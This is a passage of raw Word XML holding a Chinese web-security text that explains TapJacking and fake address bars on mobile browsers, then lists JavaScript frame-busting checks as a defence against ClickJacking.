        <w:t>，系统可取消 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>touch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>通过将一个不可见的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>覆盖到当前网页上，可以劫持用户的触屏操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3760">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1818031</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>119638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1925509" cy="2242375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="29" name="image23.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="30" name="image23.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1925509" cy="2242375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="150"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>触屏劫持原理示电图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="169" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3784">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>621323</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>489711</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4344888" cy="2481453"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="31" name="image24.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="32" name="image24.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4344888" cy="2481453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>而手机上的屏幕范围有限，手机浏览器为了节约空间，甚至隐藏了地址栏，因此手机上的视觉欺骗可能会变得更加容易实施。比如下面这个例子：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="150"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>手机屏幕的视觉欺骗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>左边的图片，最上方显示了浏览器地址栏，同时攻击者在页面中画出了一个假的地址栏；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="456" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="604" w:right="586"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>中间的图片，真实的浏览器地址栏已经自动隐藏了，此时页面中只剩下假的地址栏； 右边的图片，是浏览器地址栏被正常隐藏的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="255" w:lineRule="exact"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>这种针对视觉效果的攻击可以被利用进行钓鱼和欺诈。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="125" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-64"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark9">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>，研究者发现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>系统中实施</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-12"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>甚至可以修改系统的安全设置，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>并同时给出了演示</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="159"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>在未来，随着移动设备中浏览器功能的丰富，也许我们会看到更多 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TapJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的攻击方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="118" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>防御 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="150" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是一种视觉上的欺骗，那么如何防御它呢？针对传统的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，一般是通过禁止跨域的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>来防范。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1055" w:val="left" w:leader="none"/>
          <w:tab w:pos="1056" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1055" w:right="0" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="135"/>
        </w:rPr>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="135"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="135"/>
        </w:rPr>
        <w:t>busting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:47.689987pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3808;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="348" w:right="5006" w:hanging="320"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if ( top.location != location ) { top.location = self.location;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>通常可以写一段 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>代码，以禁止 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>的嵌套。这种方法叫 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>。比如下面这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>常见的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>有以下这些方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.904375pt;width:411.15pt;height:199.95pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3832;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if (top != self)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="4910" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if (top.location != self.location) if (top.location != location)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="2"/>
                    <w:ind w:left="28" w:right="5390" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if (parent.frames.length &gt; 0) if (window != top)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="5198" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if (window.top !== window.self) if (window.self != window.top) if (parent &amp;&amp; parent != window)</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="1261" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if (parent &amp;&amp; parent.frames &amp;&amp; parent.frames.length&gt;0) if((self.parent&amp;&amp;!(self.parent===self))&amp;&amp;(self.parent.frames.length!=0)) top.location = self.location</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="4142" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>top.location.href = document.location.href top.location.href = self.location.href top.location.replace(self.location) top.location.href = window.location.href top.location.replace(document.location) top.location.href = window.location.href top.location.href = "URL" document.write('')</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>top.location = location</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3856;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,218.144379pt" to="158.16pt,218.144379pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="386" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="5121" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark9" w:id="65"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>4 </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://blog.mylookout.com/look-10-007-tapjacking/</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:name="_bookmark10" w:id="66"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t> 5 </w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
